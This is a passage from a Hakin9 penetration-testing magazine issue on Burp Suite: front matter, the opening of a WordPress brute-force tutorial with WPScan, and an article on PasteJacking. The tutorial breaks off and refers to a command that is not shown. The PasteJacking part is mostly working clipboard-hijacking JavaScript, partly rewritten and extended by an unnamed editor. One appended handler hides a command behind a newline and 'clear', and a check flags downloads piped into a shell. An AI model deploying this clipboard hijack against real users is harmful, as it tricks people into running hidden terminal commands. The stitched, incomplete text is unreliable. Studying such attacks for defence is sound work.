TEAM

Editor-in-Chief: Joanna Kretowicz
Editors: Marta Sienicka, Marta Strzelec, Anna Kondzierska
Proofreader: Lee McKenzie
Senior Consultant/Publisher: Paweł Marciniak
CEO: Joanna Kretowicz
Marketing Director: Joanna Kretowicz
DTP: Marta Sienicka
Cover Design: Hiep Nguyen Duc

Proofreaders & Betatesters: Lee McKenzie, Avi Benchimol, Bernhard Waldecker, Hammad Arshed, Ivan Gutierrez Agramont, John Webb, David von Vistauxx, Tom Updegrove, K S Abhiraj, greg mckoy, Ayo Tayo balogun, Jonus Gerrits, Michal Jáchim, Mitch Impey, Wayne Kearns, Robert Fling, Francesco Mura, Paul Mellen, Matthew Sabin

Publisher: Hakin9 Media Sp. z o.o.
ul. Postępu 17D, 02-676 Warszawa
Phone: 1 917 338 3631
www.hakin9.org
All trademarks, trade names, or logos mentioned or used are the
property of their respective owners.
The techniques described in our articles may only be used in private,
local networks. The editors hold no responsibility for misuse of the
presented techniques or consequent data loss.
Dear Readers!
We would like to present you our newest issue, which will mainly focus on Burp Suite. We gathered all the articles we had about this tool, added new ones and prepared this compendium. Tutorials, step by step guides, and more can be found in this edition. Hamed Farid will show you how to extend Burp with Python. Junior Carreiro wrote an article showing how you can use Burp to fuzz web applications and discover SQL Injection flaws.
If you get tired of Burp, I recommend reading two amazing articles: “Demystifying the Dark Web” by Sayani Banerjee and “Browser Exploits: PasteJacking And XSSJacking” by Samrat Das. We hope that you will find many interesting articles inside the magazine and that you will have time to read them all.
Again special thanks to the Beta testers and Proofreaders who helped with this
issue. Without your assistance there would not be a Hakin9 Magazine!
Enjoy the issue,
Hakin9 Team
What is Burp Suite? (p. 7)
by Pprasoon Nigam

Brute forcing passwords using WPScan and Burp Suite, Kali Linux 2.0 (p. 60)
by Tomasz Krupa

Extending Burp Using Python (p. 71)
by Hamed Farid

Web Application Pentesting Tools: Burp Suite Playbook (p. 85)
by Pranav Jagtap

Harnessing the lesser known “Burp macros” for Penetration Testing Web Apps (p. 117)
by Samrat Das

Automating Manual Security Testing Using Burp Macros to Accelerate Manual Security Testing (p. 130)
by Prashant Kumar Khare and Sarang Dabadghao

Burp for fuzzing (p. 144)
by Junior Carreiro

Web Applications Penetration Testing Tools - Overview (p. 156)
by Andrea Cavallini

Demystifying the Dark Web (p. 163)
by Sayani Banerjee

Browser Exploits: PasteJacking And XSSJacking (p. 170)
by Samrat Das
Brute forcing passwords using WPScan and
Burp Suite, Kali Linux 2.0
by Tomasz Krupa
ABOUT THE AUTHOR
Tomasz Krupa
Security hobbyist and researcher, working for over 9 years with Linux Debian systems, big fan of London Arsenal. LPIC-1 and AWS Solutions Architect certified.
“Move swift as the Wind and closely-formed as the Wood. Attack like the Fire and be still as the Mountain.”
― Sun Tzu, The Art of War
In this article we will be testing the web security of the popular WordPress engine by simulating a brute force attack using my two favourite Kali Linux tools: WPScan and Burp Suite.
The Tools:
1) WPScan is a WordPress vulnerability scanner, written entirely in Ruby, capable of detecting security vulnerabilities in websites hosted on WordPress; it is pre-installed in Kali Linux.
WPScan is also capable of:
• Username enumeration
• Multi-threaded online password brute forcing using a supplied password list
• Version enumeration
• Vulnerability enumeration
• Plugin enumeration and plugin vulnerability enumeration
• Theme enumeration
• Directory listing detection
2) Burp Suite is a Java-based web penetration testing framework used by information security professionals to identify vulnerabilities and verify attack vectors in web applications.
In its simplest form, Burp Suite can be classified as an intercepting proxy: browser traffic is routed through the proxy, which acts as a man in the middle, capturing and analysing each request and response.
Individual HTTP requests can be paused, manipulated and replayed to the web server for targeted analysis of specific injection points, and that manual work can then be turned into automated fuzzing attacks to discover unintended application behaviour, crashes and error messages.
The Victim:
WordPress is a free and open-source content management system (CMS) based on PHP and MySQL, supporting more
than 60 million websites worldwide (according to Wikipedia).
As of February 2017, WordPress was used by more than 27.5% of the top 10 million websites and is reportedly the most popular blogging and website management system on the web.
From an architecture perspective, the WordPress engine uses a front controller pattern: all requests for non-static URIs are routed to a single PHP file that parses the URI and identifies the target page.
The community of users built around the product and its user-friendly design have resulted in a huge library of plugins and themes (both free and paid), which can truly transform a static website into a dynamic and vibrant CMS.
Scenario:
Target:
Linux Ubuntu 14.06 running standard LAMP stack
WordPress version 4.8.2
Default security plugins
Information gathering - key points:
1) Gather as much information as possible about the application and the infrastructure it resides on.
2) When testing the application, look for any entry points where user input is accepted and dynamic content is generated. Then probe these areas for weaknesses in input validation, session handling, authentication and information leakage.
Any information leak should be recorded and used to re-assess the overall understanding of the application and how it
works.
Note: The command above might return “Stop User enumerating plugin” (as shown below), which is expected on the latest versions of WordPress.
Pen testing the WordPress engine using WPScan:
Step 1) Start by updating the WPScan vulnerability database:
wpscan --update
Browser Exploits: PasteJacking and XSSJacking
by Samrat Das
ABOUT THE AUTHOR
Samrat Das
Samrat Das is a senior security researcher currently working for SecureLayer7 Technologies India. His interests revolve around penetration testing, reverse engineering and fuzzing. He can be reached on: https://twitter.com/Samrat_Das93 and www.linkedin.com/in/sam18d
Hi Readers, in the field of penetration testing we all know attacks such as Clickjacking and Cross Site Scripting; they are among the most commonly included OWASP Top 10 test cases.
However, what about learning some client side exploits that let us chain unexpected, and not so commonly accepted, attacks to perform account takeover, hijack sessions or manipulate a user's clipboard remotely? Sounds exciting? Well, that's what XSSJacking and PasteJacking are all about, read on to know more.
Today we will look into some advanced attack vectors which have been around for some time but which not everyone is aware of.
Pastejacking: the art of changing what you copy from web pages.
What is pastejacking?
• Pastejacking is a method that malicious websites employ to take control of your computer's clipboard and change its content to something harmful without your knowledge.
• It abuses an ordinary browser feature: a page's JavaScript is allowed to write to the clipboard (through the copy event or execCommand('copy')), so a malicious site can overwrite whatever you just copied.
• Nothing is executed in the browser itself. When you copy text from the page, the site silently swaps the clipboard contents, and the damage happens wherever you paste.
• If the replaced content is pasted straight into a terminal, the hidden commands are executed.
Attack scenario:
Here we have a sample page which shows the text “who am i ?” as bait for copying. Once this text is selected and copied, the clipboard contents are silently replaced with echo " I @// H4k3r".
The code for pastejacking (the listing's markup is corrected here and the truncated copy helper completed with the usual textarea-and-execCommand pattern, wired to the page's copy event so the swap happens as described above):
<html>
<body bgcolor="#E6E6FA">
<h1><marquee>"Test PasteJacking Attack"</marquee></h1>
<center>
<h4><p>"who am i ?"</p></h4>
</center>
<script>
function copyTextToClipboard(text) {
  // Put the text in a temporary textarea, select it and copy it.
  var textArea = document.createElement("textarea");
  textArea.value = text;
  document.body.appendChild(textArea);
  textArea.select();
  try {
    var successful = document.execCommand('copy');
  } catch (err) {
    console.log('Unable to copy');
  }
  document.body.removeChild(textArea);
}
// Completed from the truncated listing: on every copy, replace the clipboard
// with the payload. The flag stops the nested copy event raised by execCommand
// from re-entering this handler.
var hijacking = false;
document.addEventListener('copy', function (e) {
  if (hijacking) return;
  hijacking = true;
  copyTextToClipboard('echo " I @// H4k3r"');
  hijacking = false;
  e.preventDefault();
});
</script>
</body>
</html>
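As an added example that is not part of the article, the following JavaScript shows the same clipboard hijack written against the clipboardData API available inside the copy event (the form the execCommand trick above predates), together with a small inspection routine a practitioner can run over pasted text before trusting it. The helper functions are pure so they can be exercised under Node; only the listener wiring at the end needs a browser. The payload layout (hidden command, newline, a cosmetic clear, then the bait text) and the sample strings are constructed for illustration.

```javascript
// Added example, not from the article: pastejacking via the clipboardData API
// plus a defensive check over pasted text. Payload strings are constructed.

// What the attacker places on the clipboard when the victim copies visibleText.
// The hidden command comes first and ends in a newline, so a terminal runs it
// the moment it is pasted; "clear" then wipes the evidence and the text the
// victim expected is left sitting at the prompt.
function buildPastejackPayload(visibleText, hiddenCommand) {
  return hiddenCommand + "\n" + "clear\n" + visibleText;
}

// Attacker side: a copy-event handler that swaps the selection for the payload.
// Returns the payload so the behaviour can be checked without a real clipboard.
function pastejackCopyHandler(event, hiddenCommand) {
  const selection = typeof window !== "undefined" ? window.getSelection().toString() : "";
  const payload = buildPastejackPayload(selection, hiddenCommand);
  event.clipboardData.setData("text/plain", payload);
  event.preventDefault(); // otherwise the browser writes the real selection afterwards
  return payload;
}

// Defender side: given what the user believes they copied and what is actually
// on the clipboard, list the reasons it should not be pasted blindly.
function inspectClipboard(expectedText, clipboardText) {
  const reasons = [];
  if (clipboardText !== expectedText) reasons.push("content differs from what was selected");
  if (/[\r\n]/.test(clipboardText)) reasons.push("contains a newline, a terminal would execute it immediately");
  if (/[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]/.test(clipboardText)) reasons.push("contains control characters");
  if (/\b(curl|wget)\b[^\n]*\|\s*(sh|bash)\b/.test(clipboardText)) reasons.push("pipes a download into a shell");
  return { safe: reasons.length === 0, reasons };
}

if (typeof document !== "undefined") {
  // Browser only. Attack wiring, what a malicious page would do:
  document.addEventListener("copy", (e) => pastejackCopyHandler(e, 'echo " I @// H4k3r"'));
  // Paste-side check a defender could add to an input field or an extension:
  document.addEventListener("paste", (e) => {
    const pasted = e.clipboardData.getData("text/plain");
    const verdict = inspectClipboard(pasted.split("\n")[0], pasted);
    if (!verdict.safe) console.warn("Suspicious paste:", verdict.reasons.join("; "));
  });
}
```

The newline check is the one that matters most for the terminal case: a shell without bracketed paste mode executes everything up to each newline as soon as it arrives, so pasting into a plain text editor first, as the article's warning implies, is the practical defence.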